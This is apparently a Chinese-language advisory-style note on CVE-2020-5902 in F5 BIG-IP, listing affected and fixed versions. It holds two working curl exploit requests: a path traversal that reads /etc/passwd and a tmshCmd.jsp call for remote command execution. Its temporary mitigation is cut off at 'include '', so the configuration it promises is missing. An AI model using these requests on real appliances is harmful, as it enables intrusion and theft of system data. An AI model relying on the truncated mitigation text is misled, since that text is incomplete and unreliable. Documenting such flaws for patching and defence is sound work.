漏洞编号¶
CVE-2020-5902
影响版本¶
BIG-IP 15.x: 15.1.0/15.0.0 BIG-IP 14.x: 14.1.0 ~ 14.1.2 BIG-IP 13.x: 13.1.0 ~ 13.1.3 BIG-IP 12.x: 12.1.0 ~ 12.1.5 BIG-IP 11.x: 11.6.1 ~ 11.6.5
通用修补建议¶
升级到以下版本 BIG-IP 15.x: 15.1.0.4 BIG-IP 14.x: 14.1.2.6 BIG-IP 13.x: 13.1.3.4 BIG-IP 12.x: 12.1.5.2 BIG-IP 11.x: 11.6.5.2
临时修补建议¶
使用以下命令登录对应系统 tmsh
编辑 httpd 组件的配置文件 edit /sys httpd all-properties 文件内容如下 include '
文件读取¶
curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd' https://
远程代码执行¶
curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'